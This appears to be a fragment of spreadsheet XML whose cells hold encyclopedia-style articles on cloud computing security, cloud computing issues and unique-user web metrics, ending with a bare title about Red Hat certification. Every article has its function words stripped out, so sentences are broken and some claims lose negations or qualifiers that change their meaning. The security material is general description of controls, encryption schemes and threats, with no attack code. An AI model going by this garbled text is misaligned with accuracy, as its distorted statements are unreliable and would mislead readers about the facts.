    <t>cloud computing security simply, cloud security refers broad policies, technologies, applications, controls utilized protect virtualized data, applications, services, associated infrastructure cloud computing. sub-domain computer security, network security, and, broadly, information security. security issues associated cloud cloud computing storage provide users capabilities store process data third-party data centers. organizations cloud variety different service models (with acronyms saas, paas, iaas) deployment models (private, public, hybrid, community).security concerns associated cloud computing typically categorized ways: security issues faced cloud providers (organizations providing software-, platform-, infrastructure-as-a-service cloud) security issues faced customers (companies organizations host applications store data cloud). responsibility shared, however, often detailed cloud provider's "shared security responsibility model" "shared responsibility model." provider must ensure infrastructure secure clients’ data applications protected, user must take measures fortify application strong passwords authentication measures.when organization elects store data host applications public cloud, loses ability physical access servers hosting information. result, potentially sensitive data risk insider attacks. according 2010 cloud security alliance report, insider attacks seven biggest threats cloud computing. therefore, cloud service providers must ensure thorough background checks conducted employees physical access servers data center. additionally, data centers recommended frequently monitored suspicious activity. order conserve resources, costs, maintain efficiency, cloud service providers often store customer's data server. result, chance user's private data viewed users (possibly even competitors). handle sensitive situations, cloud service providers ensure proper data isolation logical storage segregation.the extensive virtualization implementing cloud infrastructure brings unique security concerns customers tenants public cloud service. virtualization alters relationship underlying hardware computing, storage even networking. this introduces additional layer virtualization must properly configured, managed secured. specific concerns include potential compromise virtualization software, "hypervisor". while concerns largely theoretical, exist. example, breach administrator workstation management software virtualization software cause whole data center reconfigured attacker's liking. cloud security controls cloud security architecture effective correct defensive implementations place. efficient cloud security architecture recognize issues arise security management follow best practices, procedures, guidelines ensure secure cloud environment. security management addresses issues security controls. these controls protect cloud environments place safeguard weaknesses system reduce effect attack. while many types controls behind cloud security architecture, usually found following categories: deterrent controls these controls administrative mechanisms intended reduce attacks cloud system utilized ensure compliance external controls. much like warning sign fence property, deterrent controls typically reduce threat level informing potential attackers adverse consequences proceed. (some consider subset preventive controls.) examples controls could considered policies, procedures, standards, guidelines, laws, regulations guide organization towards security. although malicious actors ignore deterrent controls, controls intended ward inexperienced curious compromising infrastructure organization.preventive controls main objective preventive controls strengthen system incidents, generally reducing actually eliminating vulnerabilities, well preventing unauthorized intruders accessing entering system. this could achieved either adding software feature implementations (such firewall protection, endpoint protection, multi-factor authentication), removing unneeded functionalities attack surface minimized unikernel applications). additionally, educating individuals security awareness training exercises included controls human error weakest point security. strong authentication cloud users, instance, makes less likely unauthorized users access cloud systems, likely cloud users positively identified. all, preventative controls affect likelihood loss event occurring intended prevent eliminate systems’ exposure malicious action.detective controls detective controls intended detect react appropriately incidents occur. event attack, detective control signal preventative corrective controls address issue. detective security controls function activity progress occurred. system network security monitoring, including intrusion detection prevention arrangements, typically employed detect attacks cloud systems supporting communications infrastructure. most organizations acquire create dedicated security operations center (soc), dedicated members continuously monitor organization’s infrastructure logs security information event management (siem) software. siems security solutions help organizations security teams analyze “log data real-time swift detection security incidents.” siems examples detective controls. there also physical security controls, intrusion detection systems, anti-virus/anti-malware tools, different functions centered around exact purpose detecting security compromises within infrastructure.corrective controls corrective controls reduce consequences incident, generally limiting damage. such controls include technical, physical, administrative measures occur incident restore systems resources previous state security incident. there plenty examples corrective controls, physical technical. instance, re-issuing access card repairing physical damage considered corrective controls. however, technical controls terminating process administrative controls implementing incident response plan could also considered corrective controls. corrective controls focused recovering repairing damage caused security incident unauthorized activity. value needed change function security. dimensions cloud security cloud security engineering characterized security layers, plan, design, programming, best practices exist inside cloud security arrangement. cloud security engineering requires composed visual model (design characterized tasks inside cloud. this cloud security engineering process includes things access executives, techniques, controls ensure applications information. also includes ways deal keep permeability, consistency, danger stance, large security. processes imparting security standards cloud administrations activities assume approach fulfills consistent guidelines essential framework security parts.for interest cloud advancements viable, companies recognize various parts cloud remain impact help them. these interests include investments cloud computing security, example. this course leads leads driving push cloud advancements succeed. though idea cloud computing new, associations increasingly enforcing flexible scalability, relative trustability, cost frugality services. however, despite rapid-fire relinquishment sectors disciplines, apparent exploration statistics security-related pitfalls conspicuous hedge wide relinquishment.it generally recommended information security controls selected implemented according proportion risks, typically assessing threats, vulnerabilities impacts. cloud security concerns grouped various ways; gartner named seven cloud security alliance identified twelve areas concern. cloud access security brokers (casbs) software sits cloud users cloud applications provide visibility cloud application usage, data protection governance monitor activity enforce security policies. security privacy service without "hardened" environment considered "soft" target. virtual servers protected like physical server data leakage, malware, exploited vulnerabilities. "data loss leakage represents 24.6% cloud related malware 3.4% threats causing cloud outages” identity management every enterprise identity management system control access information computing resources. cloud providers either integrate customer's identity management system infrastructure, using federation technology biometric-based identification system, provide identity management system own. cloudid, instance, provides privacy-preserving cloud-based cross-enterprise biometric identification. links confidential information users biometrics stores encrypted fashion. making searchable encryption technique, biometric identification performed encrypted domain make sure cloud provider potential attackers gain access sensitive data even contents individual queries. physical security cloud service providers physically secure hardware (servers, routers, cables etc.) unauthorized access, interference, theft, fires, floods etc. ensure essential supplies (such electricity) sufficiently robust minimize possibility disruption. this normally achieved serving cloud applications professionally specified, designed, constructed, managed, monitored maintained data centers. personnel security various information security concerns relating professionals associated cloud services typically handled pre-, para- post-employment activities security screening potential recruits, security awareness training programs, proactive. privacy providers ensure critical data (credit card numbers, example) masked encrypted authorized users access data entirety. moreover, digital identities credentials must protected data provider collects produces customer activity cloud. penetration testing penetration testing process performing offensive security tests system, service, computer network find security weaknesses since cloud shared environment customers tenants, following penetration testing rules engagement step-by-step mandatory requirement. scanning penetration testing inside outside cloud authorized cloud provider. violation acceptable policies lead termination service. cloud vulnerability penetration testing scanning cloud outside inside using free commercial products crucial without hardened environment service considered soft target. virtual servers hardened like physical server data leakage, malware, exploited vulnerabilities. "data loss leakage represents 24.6% cloud-related malware 3.4% threats causing cloud outages” scanning penetration testing inside outside cloud must authorized cloud provider. since cloud shared environment customers tenants, following penetration testing rules engagement step-by-step mandatory requirement. violation acceptable policies lead termination service. some terminology grasp discussing penetration testing difference application network layer testing. understanding asked tester sometimes important step process. network-layer testing refers testing includes internal/external connections well interconnected systems throughout local network. oftentimes, social engineering attacks carried out, vulnerable link security often employee. white-box testing testing condition “attacker” full knowledge internal network, design, implementation. grey-box testing testing condition “attacker” partial knowledge internal network, design, implementation. black-box testing testing condition “attacker” prior knowledge internal network, design, implementation. data security there numerous security threats associated cloud data services. this includes traditional threats non-traditional threats. traditional threats include: network eavesdropping, illegal invasion, denial service attacks, also specific cloud computing threats, side channel attacks, virtualization vulnerabilities, abuse cloud services. order mitigate threats security controls often rely monitoring three areas triad. triad refers confidentiality, integrity, well access controllability understood following.it important note many effective security measures cover several three categories. encryption example prevents unauthorized access result ensures confidentiality, availability, integrity data. backups hand generally cover integrity firewalls cover confidentiality access controllability. confidentiality data confidentiality property data contents made available disclosed illegal users. outsourced data stored cloud owners' direct control. only authorized users access sensitive data others, including csps, gain information data. meanwhile, data owners expect fully utilize cloud data services, e.g., data search, data computation, data sharing, without leakage data contents csps adversaries. confidentiality refers data must kept strictly confidential owner said data example security control covers confidentiality encryption authorized users access data. access controllability access controllability means data owner perform selective restriction access data outsourced cloud. legal users authorized owner access data, others access without permission. further, desirable enforce fine-grained access control outsourced data, i.e., different users granted different access privileges regard different data pieces. access authorization must controlled owner untrusted cloud environments. access control also referred availability. while unauthorized access strictly prohibited, access administrative even consumer uses allowed monitored well. availability access control ensure proper amount permissions granted correct persons. integrity data integrity demands maintaining assuring accuracy completeness data. data owner always expects data cloud stored correctly trustworthy. means data illegally tampered with, improperly modified, deliberately deleted, maliciously fabricated. undesirable operations corrupt delete data, owner able detect corruption loss. further, portion outsourced data corrupted lost, still retrieved data users. effective integrity security controls beyond protection malicious actors protect data unintentional alterations well. example security control covers integrity automated backups information. risks vulnerabilities cloud computing while cloud computing cutting edge information technology risks vulnerabilities consider investing fully security controls services exist cloud security system guaranteed succeed. furthermore, risks extend beyond asset security involve issues productivity even privacy well. privacy concerns cloud computing still emerging technology thus developing relatively technological structures. result, cloud services must undertake privacy impact assessments pias releasing platform. consumers well intend clouds store customer's data must also aware vulnerabilities non-physical storage private information. unauthorized access management interface autonomous nature cloud, consumers often given management interfaces monitor databases. controls congregated location interface easily accessible convenience users, possibility single actor could gain access cloud's management interface; giving great deal control power database. data recovery vulnerabilities cloud's capabilities allocating resources needed often result resources memory otherwise recycled another user later event. memory storage resources, could possible current users access information left previous ones. internet vulnerabilities cloud requires internet connection therefore internet protocols access. therefore, open many internet protocol vulnerabilities man-in-the-middle attacks. furthermore, heavy reliance internet connectivity, connection fails consumers completely cloud resources. encryption vulnerabilities cryptography ever-growing field technology. what secure years considered significant security risk today's standards. technology continues advance older technologies grow old, methods breaking encryptions emerge well fatal flaws older encryption methods. cloud providers must keep date encryption data typically contain especially valuable. legal issues privacy legislation often varies country country. information stored cloud difficult determine jurisdictions data falls under. transborder clouds especially popular given largest companies transcend several countries. other legal dilemmas ambiguity cloud refer difference privacy regulation information shared information shared inside organizations. attacks there several different types attacks cloud computing, still much untapped infrastructure compromise. though completely known listed attack highest amount payoff. what makes dangerous person carrying attack able gain level privilege essentially root access machine. hard defend attacks like unpredictable unknown, attacks type also called zero exploits difficult defend since vulnerabilities previously unknown unchecked attack already occurred. attacks systems unavailable users. since cloud computing software used large numbers people, resolving attacks increasingly difficult. cloud computing rise, left opportunities attacks virtualization data centers cloud services utilized more.with global pandemic started early 2020 taking effect, massive shift remote work, companies became reliant cloud. this massive shift gone unnoticed, especially cybercriminals actors, many opportunity attack cloud remote work environment. companies constantly remind employees keep constant vigilance especially remotely. constantly keeping date latest security measures policies, mishaps communication things cybercriminals looking prey upon. moving work household critical workers able continue, move remote work happened, several security issues arose quickly. need data privacy, using applications, personal devices, internet came forefront. pandemic large amounts data generated especially healthcare sector. data accrued healthcare sector ever growing coronavirus pandemic. cloud able organize share data users securely. quality data looks four things: accuracy, redundancy, completeness consistency.users think fact massive amounts data shared globally. different countries certain laws regulations adhered differences policy jurisdiction give rise risk involved cloud. workers using personal devices working home. criminals increase opportunity exploit people, software developed infect people's devices gain access cloud. current pandemic people situation incredibly vulnerable susceptible attacks. change remote work sudden many companies simply unprepared deal tasks subsequent workload found deeply entrenched tighter security measures place ease newfound tension within organizations. encryption some advanced encryption algorithms applied cloud computing increase protection privacy. practice called crypto-shredding, keys simply deleted data. attribute-based encryption (abe) attribute-based encryption type public-key encryption secret user ciphertext dependent upon attributes (e.g. country lives, kind subscription has). system, decryption ciphertext possible attributes user matches attributes ciphertext. some strengths attribute-based encryption attempts solve issues exist current public-key infrastructure(pki) identity-based encryption(ibe) implementations. relying attributes circumvents needing share keys directly, pki, well know identity receiver, ibe. these benefits come cost suffers decryption re-distribution problem. since decryption keys contain information regarding access structure attributes user hard verify user's actual identity. thus malicious users intentionally leak attribute information unauthorized users imitate gain access. ciphertext-policy (cp-abe) ciphertext-policy (cp-abe) type public-key encryption. cp-abe, encryptor controls access strategy. main research work cp-abe focused design access structure. ciphertext-policy attribute-based encryption scheme consists four algorithms: setup, encrypt, keygen, decrypt. setup algorithm takes security parameters attribute universe description input outputs public parameters master key. encryption algorithm takes data input. encrypts produce ciphertext user possesses attributes satisfies access structure decrypt message. keygen algorithm takes master user's attributes develop private key. finally, decrypt algorithm takes public parameters, ciphertext, private key, user attributes input. with information, algorithm first checks users’ attributes satisfy access structure decrypts ciphertext return data. key-policy (kp-abe) key-policy attribute-based encryption, kp-abe, important type attribute-based encryption. kp-abe allows senders encrypt messages attributes, much like attribute based encryption system. encryption, private user keys generated contain decryption algorithms deciphering message private user keys grant users access specific messages correspond kp-abe system, ciphertexts, encrypted messages, tagged creators attributes, user's private keys issued specify type ciphertexts decrypt. private keys control ciphertexts user able decrypt. kp-abe, attribute sets used describe encrypted texts private keys associated specified policy users decryption ciphertexts. drawback kp-abe kp-abe encryptor control access encrypted data, except descriptive attributes, creates reliance key-issuer granting denying access users. hence, creation systems ciphertext-policy attribute-based encryption. fully homomorphic encryption (fhe) fully homomorphic encryption cryptosystem supports arbitrary computation ciphertext also allows computing product encrypted data without decryption. another interesting feature fully homomorphic encryption short allows operations executed without need secret key. linked cloud computing electronic voting well. fully homomorphic encryption especially helpful development cloud computing computing technologies. however, systems developing need cloud security also increased. aims secure data transmission well cloud computing storage encryption algorithms. goal much secure efficient method encryption larger scale handle massive capabilities cloud. searchable encryption (se) searchable encryption cryptographic system offers secure search functions encrypted data. schemes classified categories: based secret-key symmetric-key) cryptography, based public-key cryptography. order improve search efficiency, symmetric-key generally builds keyword indexes answer user queries. this obvious disadvantage providing multimodal access routes unauthorized data retrieval, bypassing encryption algorithm subjecting framework alternative parameters within shared cloud environment. compliance numerous laws regulations pertaining storage data. include privacy data protection laws, payment card industry data security standard (pci dss), health insurance portability accountability (hipaa), sarbanes-oxley act, federal information security management 2002 (fisma), children's online privacy protection 1998, among others. similar standards exist jurisdictions, e.g. singapore's multi-tier cloud security standard. similar laws apply different legal jurisdictions differ quite markedly enforced cloud service users often need aware legal regulatory differences jurisdictions. example, data stored cloud service provider located say, singapore mirrored us.many regulations mandate particular controls (such strong access controls audit trails) require regular reporting. cloud customers must ensure cloud providers adequately fulfill requirements appropriate, enabling comply obligations since, large extent, remain accountable. business continuity data recovery cloud providers business continuity data recovery plans place ensure service maintained case disaster emergency data loss recovered. these plans shared reviewed customers, ideally dovetailing customers' continuity arrangements. joint continuity exercises appropriate, simulating major internet electricity supply failure instance.log audit trail addition producing logs audit trails, cloud providers work customers ensure logs audit trails properly secured, maintained long customer requires, accessible purposes forensic investigation (e.g., ediscovery).unique compliance requirements addition requirements customers subject, data centers used cloud providers also subject compliance requirements. using cloud service provider (csp) lead additional security concerns around data jurisdiction since customer tenant data remain system, data center, even within provider's cloud. european union’s gdpr introduced compliance requirements customer data. legal contractual issues aside security compliance issues enumerated above, cloud providers customers negotiate terms around liability (stipulating incidents involving data loss compromise resolved, example), intellectual property, end-of-service (when data applications ultimately returned customer). addition, considerations acquiring data cloud involved litigation. these issues discussed service-level agreements (sla). public records legal issues also include records-keeping requirements public sector, many agencies required retain make available electronic records specific fashion. this determined legislation, require agencies conform rules practices records-keeping agency. public agencies using cloud computing storage must take concerns account. also computer security common vulnerabilities exposures references further reading mowbray, miranda april 2009). "the grimpen mire: cloud computing law". script-ed. (1): 132–146. doi:10.2966/scrip.060109.132. mather, tim; kumaraswamy, subra; latif, shahed (2009). cloud security privacy: enterprise perspective risks compliance. o'reilly media, inc. isbn 9780596802769. winkler, (2011). securing cloud: cloud computer security techniques tactics. elsevier. isbn 9781597495929. ottenheimer, davi (2012). securing virtual environment: defend enterprise against attack. wiley. isbn 9781118155486. iso/iec 27017: "information technology. security techniques. code practice information security controls based iso/iec 27002 cloud services." (2015) iso/iec 27018: "information technology. security techniques. code practice protection personally identifiable information (pii) public clouds acting processors." (2014) iso/iec 27036-4: "information technology. security techniques. information security supplier relationships. guidelines security cloud services" (2016) external links cloud security alliance check point cloud security cloud security solutions cloud security requires multiple layers beginner's guide cloud security cloud computing security requirements guide srg)archived 2018-10-21 wayback machine</t>
  </si>
  <si>
    <t>Cloud computing issues</t>
  </si>
  <si>
    <t>cloud computing become social phenomenon used people every day. every important social phenomenon issues limit widespread adoption. present scenario, cloud computing seen fast developing area instantly supply extensible services using internet help hardware software virtualization. biggest advantage cloud computing flexible lease release resources requirement user. other benefits encompass betterment efficiency, compensating costs operations. curtails high prices hardware software although, numerous benefits adopting latest cloud technology still privacy issues involved cloud computing cloud time data outbreak service provider information deleted purposely. there security issues various kinds related cloud computing falling broader categories: first, issues related cloud security cloud providers face (like software provided organizations, infrastructure service). secondly, issues related cloud security customers experience (organizations store data cloud)most issues start fact user loses control data, stored computer belonging someone else (the cloud provider). this happens owner remote servers person organization user; interests point different directions (for example, user wish information kept private, owner remote servers want take advantage business). other issues hampering adoption cloud technologies include uncertainties related guaranteed provisioning, automated management, remediation cloud systems.many issues relate cloud computing, discussed here: threats opportunities cloud project initiator richard stallman characterized cloud computing raising cost information-ownership concerns.oracle founder larry ellison viewed trend "cloud computing" terms "fashion-driven [...] complete gibberish".however, concept cloud computing appeared gain steam, major european technology decision-makers seeing cloud priority 2013 2014, cloud budget reach overall budget.according techinsights report 2013: cloud succeeds based survey, cloud implementations generally meet exceed expectations across major service models, infrastructure service (iaas), platform service (paas) software service (saas).several deterrents widespread adoption cloud computing remain. they include: reliability availability services data security complexity costs regulations legal issues performance migration reversion lack standards limited customization issues privacythe cloud offers many strong points: infrastructure flexibility, faster deployment applications data, cost control, adaptation cloud resources real needs, improved productivity, etc. cloud market early 2010s especially private clouds dominated software services saas mode iaas (infrastructure). paas public cloud comparison. privacy increased cloud computing services gmail google docs pressed issue privacy concerns cloud computing services utmost importance. provider services position greater cloud computing services given access plethora data. this access immense risk data disclosed either accidentally deliberately. privacy companies compromised information sent cloud service provider. privacy advocates criticized cloud model giving hosting companies' greater ease control—and thus, monitor will—communication host company user, access user data (with without permission). instances secret program, working at&amp;t, verizon, recorded million telephone calls american citizens, causes uncertainty among privacy advocates, greater powers gives telecommunication companies monitor user activity. cloud service provider (csp) complicate data privacy extent virtualization (virtual machines) cloud storage used implement cloud service. operations, customer tenant data remain system, data center even within provider's cloud; lead legal concerns jurisdiction. while efforts (such us-eu safe harbor) "harmonise" legal environment, providers amazon still cater major markets (typically united states european union) deploying local infrastructure allowing customers select "regions availability zones". cloud computing poses privacy concerns service provider access data cloud time. could accidentally deliberately alter even delete information. this becomes major concern service providers employ administrators, leave room potential unwanted disclosure information cloud. other technical issues sometimes technical issues like servers might time becomes difficult gain access resources time anywhere e.g. non-availability services denial service attack. technique cloud computing always strong internet connection without would able take advantage cloud computing. issue related cloud computing consumes great power physical devices smartphone. sharing information without warrant many cloud providers share information third parties necessary purposes order even without warrant. that permitted privacy policies users agree start using cloud services.there life-threatening situations time wait police issue warrant. many cloud providers share information immediately police situations. example privacy policy allows dropbox privacy policy states share information discussed order. disclose information third parties determine disclosure reasonably necessary comply law; protect person death serious bodily injury; prevent fraud abuse dropbox users; protect dropbox's property rights. previous situation sydney morning herald reported mosman bomb hoax, life-threatening situation, that: whether police needed warrant access information likely have, byrne said depended process taken. "gmail process terms legal disclosure guidelines [that] done search warrant exceptions apply different parts world different service providers. example, facebook generally provides exception emergency life threatening situations signed enforcement." another computer forensic expert it4ensics, works large corporations dealing matters like internal fraud, scott lasak, said police "would contact google" "being police background google would assist them". "whether need warrants sort thing sure. even address might even need warrant something like police background. police would comment whether received help google. search giant also declined comment, instead offering standard statement cooperated enforcement. spokesman online users' lobby group electronic frontiers australia, stephen collins, said google likely handed need information basis "probable cause warrant", said "perfectly legitimate". also said happens relative frequency. such things rarely used australia trivial malevolent purposes.” privacy solutions solutions privacy cloud computing include policy legislation well users' choices data stored. cloud service provider needs establish clear relevant policies describe data cloud user accessed used. cloud service users encrypt data processed stored within cloud prevent unauthorized access. cryptographic encryption mechanisms certainly best options. addition, authentication integrity protection mechanisms ensure data goes customer wants modified transit. strong authentication mandatory requirement cloud deployment. user authentication primary basis access control, specially cloud environment, authentication access control important ever since cloud data publicly accessible. biometric identification technologies linking users' biometrics information data available. these technologies searchable encryption techniques, perform identification encrypted domain cloud providers potential attackers gain access sensitive data even contents individual queries. compliance comply regulations including fisma, hipaa, united states, data protection directive credit card industry's dss, users adopt community hybrid deployment modes typically expensive offer restricted benefits. this google able "manage meet additional government policy requirements beyond fisma" rackspace cloud qubespace able claim compliance.many providers also obtain type audit, criticised grounds hand-picked goals standards determined auditor auditee often disclosed vary widely. providers typically make information available request, non-disclosure agreement.customers contracting cloud providers outside eu/eea adhere regulations export personal data.a multitude laws regulations forced specific compliance requirements onto many companies collect, generate store data. these policies dictate wide array data storage policies, long information must retained, process used deleting data, even certain recovery plans. below examples compliance laws regulations. united states, health insurance portability accountability (hipaa) requires contingency plan includes, data backups, data recovery, data access emergencies. privacy laws switzerland demand private data, including emails, physically stored switzerland. united kingdom, civil contingencies 2004 sets forth guidance business contingency plan includes policies data storage.in virtualized cloud computing environment, customers never know exactly data stored. fact, data stored across multiple data centers effort improve reliability, increase performance, provide redundancies. this geographic dispersion make difficult ascertain legal jurisdiction disputes arise. fedramp u.s. federal agencies directed office management budget process called fedramp (federal risk authorization management program) assess authorize cloud products services. federal steven vanroekel issued memorandum federal agency chief information officers december 2011 defining federal agencies fedramp. fedramp consists subset nist special publication 800-53 security controls specifically selected provide protection cloud environments. subset defined fips categorization fips moderate categorization. fedramp program also established joint accreditation board (jab) consisting chief information officers dod, dhs, gsa. responsible establishing accreditation standards party organizations perform assessments cloud solutions. also reviews authorization packages, grant provisional authorization operate). federal agency consuming service still final responsibility final authority operate. legal changes landscape computing, certain legal issues arise cloud computing, including trademark infringement, security concerns sharing proprietary data resources. electronic frontier foundation criticized united states government megaupload seizure process considering people lose property rights storing data cloud computing service.one important often mentioned problem cloud computing problem "possession" data. cloud company possessor data, possessor certain legal rights. cloud company "custodian" data, different rights would apply. next problem legalities cloud computing problem legal ownership data. many terms service agreements silent question ownership.these legal issues confined time period cloud-based application actively used. there must also consideration happens provider-customer relationship ends. cases, event addressed application deployed cloud. however, case provider insolvencies bankruptcy state data become blurred. vendor lock-in because cloud computing still relatively new, standards still developed. many cloud platforms services proprietary, meaning built specific standards, tools protocols developed particular vendor particular cloud offering. this make migrating proprietary cloud platform prohibitively complicated expensive.three types vendor lock-in occur cloud computing: platform lock-in: cloud services tend built several possible virtualization platforms, example vmware xen. migrating cloud provider using platform cloud provider using different platform could complicated. data lock-in: since cloud still new, standards ownership, i.e. actually owns data lives cloud platform, developed, could make complicated cloud computing users ever decide move data cloud vendor's platform. tools lock-in: tools built manage cloud environment compatible different kinds virtual physical infrastructure, tools able manage data apps live vendor's particular cloud environment.heterogeneous cloud computing described type cloud environment prevents vendor lock-in, aligns enterprise data centers operating hybrid cloud models. absence vendor lock-in lets cloud administrators select choice hypervisors specific tasks, deploy virtualized infrastructures enterprises without need consider flavor hypervisor enterprise.a heterogeneous cloud considered includes on-premises private clouds, public clouds software-as-a-service clouds. heterogeneous clouds work environments virtualized, traditional data centers. heterogeneous clouds also allow piece parts, hypervisors, servers, storage, multiple vendors.cloud piece parts, cloud storage systems, offer apis often incompatible other. result complicated migration backends, makes difficult integrate data spread across various locations. this described problem vendor lock-in. solution clouds adopt common standards.heterogeneous cloud computing differs homogeneous clouds, described using consistent building blocks supplied single vendor. intel general manager high-density computing, jason waxman, quoted saying homogeneous system 15,000 servers would cost million capital expenditure megawatt power. open source open-source software provided foundation many cloud computing implementations, prominent examples hadoop framework vmware's cloud foundry. november 2007, free software foundation released affero general public license, version gplv3 intended close perceived legal loophole associated free software designed network. open standards most cloud providers expose apis typically well documented (often creative commons license) also unique implementation thus interoperable. some vendors adopted others' apis number open standards development, view delivering interoperability portability. november 2012, open standard broadest industry support probably openstack, founded 2010 nasa rackspace, governed openstack foundation. openstack supporters include amd, intel, canonical, suse linux, hat, cisco, dell, ibm, yahoo, huawei vmware. security security generally desired state free harm (anything compromises state entity's well-being). defined information security, condition information asset protected confidentiality (quality state free unauthorised insecure disclosure contrary defined access rights listed access control list matrix), integrity quality state whole/ complete original uncorrupted functionally proven hash integrity values) availability desired state information resource accessible authorised parties listed access control list matrix) desired state right time. security important domain cloud computing concerned, number issues addressed cloud perfectly secure condition doubt ever achieved)(martin muduva, 2015). cloud computing achieving increased popularity, concerns voiced security issues introduced adoption model. effectiveness efficiency traditional protection mechanisms reconsidered characteristics innovative deployment model differ widely traditional architectures. alternative perspective topic cloud security another, although quite broad, case "applied security" similar security principles apply shared multi-user mainframe security models apply cloud security.the relative security cloud computing services contentious issue delaying adoption. physical control private cloud equipment secure equipment site someone else's control. physical control ability visually inspect data links access ports required order ensure data links compromised. issues barring adoption cloud computing large part private public sectors' unease surrounding external management security-based services. nature cloud computing-based services, private public, promote external management provided services. this delivers great incentive cloud computing service providers prioritize building maintaining strong management secure services. security issues categorised sensitive data access, data segregation, privacy, exploitation, recovery, accountability, malicious insiders, management console security, account control, multi-tenancy issues. solutions various cloud security issues vary, cryptography, particularly public infrastructure (pki), multiple cloud providers, standardisation apis, improving virtual machine support legal support.cloud computing offers many benefits, vulnerable threats. cloud computing uses increase, likely criminals find ways exploit system vulnerabilities. many underlying challenges risks cloud computing increase threat data compromise. mitigate threat, cloud computing stakeholders invest heavily risk assessment ensure system encrypts protect data, establishes trusted foundation secure platform infrastructure, builds higher assurance auditing strengthen compliance. security concerns must addressed maintain trust cloud computing technology.data breach concern cloud computing. compromised server could significantly harm users well cloud providers. variety information could stolen. these include credit card social security numbers, addresses, personal messages. u.s. requires cloud providers notify customers breaches. once notified, customers worry identity theft fraud, providers deal federal investigations, lawsuits reputational damage. customer lawsuits settlements resulted billion losses cloud providers. availability cloud provider shut without warning. instance, anki robot company suddenly went bankrupt 2019, making million robots unresponsive voice command. sustainability although cloud computing often assumed form green computing, currently measure "green" computers are.the primary environmental problem associated cloud energy use. phil radford greenpeace said concerned explosion electricity could lock old, polluting energy sources instead clean energy available today.” greenpeace ranks energy usage brands cloud computing, successfully urged several companies switch clean energy. thursday, december 2011, greenpeace facebook announced together facebook would shift clean renewable energy power operations. soon thereafter, apple agreed make data centers ‘coal free’ 2013 doubled amount solar energy powering maiden, data center. following suit, salesforce agreed shift 100% clean energy 2020.citing servers' effects environmental effects cloud computing, areas climate favors natural cooling renewable electricity readily available, environmental effects moderate. (the holds true "traditional" data centers.) thus countries favorable conditions, finland, sweden switzerland, trying attract cloud computing data centers. energy efficiency cloud computing result energy-aware scheduling server consolidation. however, case distributed clouds data centers different sources energy including renewable energy, energy efficiency reduction could result significant carbon footprint reduction. abuse privately purchased hardware, customers purchase services cloud computing nefarious purposes. this includes password cracking launching attacks using purchased services. 2009, banking trojan illegally used popular amazon service command control channel issued software updates malicious instructions infected malware. governance introduction cloud computing requires appropriate governance model ensure secured computing environment comply relevant organizational information technology policies. such, organizations need capabilities essential effectively implementing managing cloud services, including demand management, relationship management, data security management, application lifecycle management, risk compliance management. danger lies explosion companies joining growth cloud computing becoming providers. however, many infrastructural logistical concerns regarding operation cloud computing businesses still unknown. this over-saturation ramifications industry whole. consumer storage increased cloud computing could lead reduction demand high storage capacity consumer devices, cheaper storage devices stream content cloud becoming popular. wired article, jake gardner explains unregulated usage beneficial tech moguls like amazon, anonymous nature cost consumption cloud usage makes difficult business evaluate incorporate business plans. ambiguity terminology outside information technology software industry, term "cloud" found reference wide range services, fall category cloud computing, others not. cloud often used refer product service discovered, accessed paid internet, necessarily computing resource. examples service sometimes referred "the cloud" include, limited crowd sourcing, cloud printing, crowd funding, cloud manufacturing. performance interference noisy neighbors multi-tenant nature resource sharing, cloud computing must also deal "noisy neighbor" effect. this effect essence indicates shared infrastructure, activity virtual machine neighboring core physical host lead increased performance degradation physical host, issues e.g. cache contamination. fact neighboring activated deactivated arbitrary times, result increased variation actual performance cloud resources. this effect seems dependent nature applications inside also factors scheduling parameters careful selection lead optimized assignment order minimize phenomenon. this also difficulties comparing various cloud providers cost performance using traditional benchmarks service application performance, time period location benchmark performed result widely varied results. this observation turn research efforts make cloud computing applications intrinsically aware changes infrastructure application automatically adapt avoid failure. monopolies privatization cyberspace philosopher slavoj žižek points that, although cloud computing enhances content accessibility, access "increasingly grounded virtually monopolistic privatization cloud provides access". according him, access, necessarily mediated handful companies, ensures progressive privatization global cyberspace. žižek criticizes argument purported supporters cloud computing phenomenon part "natural evolution" internet, sustaining quasi-monopolies "set prices also filter software provide give "universality" particular twist depending commercial ideological interests." also cloud computing references</t>
  </si>
  <si>
    <t>Unique user</t>
  </si>
  <si>
    <t>according ifabc global standards, unique user (uu) address plus identifier." term 'unique user' used interchangeably 'unique visitor' (see below). systems users allocated addresses dynamically (for example dial-up internet service providers), metric overstate understate real number individual users accessed given website.unique user counts websites typically counted using cookies. when browser visits website, website checks particular cookie. cookie present, recorded, number unique users increases one. cookie present, website create cookie, number unique users updated. criticism website popularity commonly determined using number unique users, metric often quoted potential advertisers investors. website's number unique users usually measured standard period time, typically month.use performance indicators like unique visitors/users criticized. greg harmon belden research inferred many companies reporting online performance "may overstate" number unique visitors limitations metric. this increasing number people access websites multiple physical devices different addresses, thus counted multiple times. websites track users using cookies instead addresses safe either, users regularly delete cookies devices, others multiple browsers access single website. this means typical news site, example, people might visit keep breaking news, reported number unique users overstate number different people factor four. understanding unique users numbers similar turf (total unduplicated reach frequency) metric often used television, radio newspaper analyses, unique users measure distribution content number distinct consumers. common mistake using unique user numbers adding unique user numbers across dimensions. unique user metric valid given dimensions e.g. time, browsers. example, website unique users (day dimension) particular week. with data, cannot extrapolate number weekly unique users (only unique user count week 700). however, website administrators track unique user traffic longer period time build reliable view performance direct competitors within sector. online businesses tend static conversion rate unique users business clients.when calculating movement unique users conversion funnel, time period must used every step. unique visitor unique visitors refers number distinct individuals requesting pages website given period, regardless often visit. because visitor make multiple visits specified period, number visits greater number visitors. visitor sometimes referred unique visitor unique user clearly convey idea visitor counted once.the purpose tracking unique visitors help marketers understand website user behavior. measurement users visitors requires standard time period distorted automatic activity (such bots) classify content. estimation visitors, visits, traffic statistics usually filtered remove type activity eliminating known addresses bots, requiring registration cookies, using panel data. also active users (internet) registered user traffic analytics notes</t>
  </si>
  <si>
    <t>Red Hat Certification Program</t>
  </si>
  <si>
